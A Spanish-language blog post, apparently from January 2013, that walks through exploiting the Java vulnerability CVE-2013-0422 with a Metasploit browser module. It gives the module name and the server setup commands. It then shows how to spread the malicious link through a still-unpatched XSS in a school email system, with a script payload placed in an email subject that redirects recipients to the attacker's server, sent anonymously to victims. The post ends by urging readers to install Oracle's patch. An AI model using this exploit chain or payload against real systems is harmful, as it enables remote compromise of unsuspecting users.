0
Estos días Java ha vuelto a ser noticia y no para bien, pues se comentaba en los medios la existencia de una nueva vulnerabilidad 0-Day que permite ejecutar código de forma remota. Ha sido clasificada como CVE 2013-0422.

  Metasploit por su parte acaba de incluirla en su rama gratuita, así que probaremos que tal funciona sobre la última versión de java disponible, Java 7 Update 10 (a día de hoy 13/01/2013).

  Lo primero que he hecho ha sido actualizar el navegador y el plugin de java a las últimas versiones de cada uno:



 Para, acto seguido lanzar metasploit y ejecutar un msfupdate para tener nuestro framework a la última con el exploit de java en su base de datos.


Lo siguiente es escoger el exploit y configurarlo:
use exploit/multi/browser/java_jre17_jmxbean
Establecemos la IP del servidor (la nuestra):
set SRVHOST <IP>
el puerto:
set SRVPORT <puerto>
y lanzamos el exploit:
exploit


 En este momento el servidor se quedará esperando conexiones y nos ofrecerá una dirección que será la que las víctimas accederán.

¿Cómo difundimos el enlace?

ey una vulnerabilidad en paginas escolares que ejecutaba un XSS al recibir un correo en la bandeja, simplemente con escribir código html/Javascript en el asunto de un correo 

  Dicha vulnerabilidad sigue estando vigente, y es perfecta para que un atacante la aprovechase, así que terminal en mano vamos a mandar un correo de forma ANÓNIMA a una víctima (o varias) con un asunto adaptado para tal magnifica ocasión:
Subject:<script>document.location="dirección_facilitada_por_metasploit"</script>



  Cada receptor del correo, será redirigido automáticamente a la dirección del servidor de Metasploit y éste hará su trabajo:




  Mención "especial" por decirlo de alguna manera a Google-Chrome que muestra una advertencia referente a un plugin de Java que quiere ejecutarse preguntándonos si lo permitimos o no. En el caso de IE y Firefox éstos callan como putas y son comprometidos.


Fuente / Más información


Actualización => Desde ayer (13/01/2013) existe un parche por parte de Oracle ("Update 11") que corrige el fallo, ACTUALIZAD!!

Y aquí cierro mi particular versión sobre la esta peligrosa vulnerabilidad relacionada con la ultima versión de Java, nos leemos despues y se vale comentar ;)






Publicar un comentario

 
Top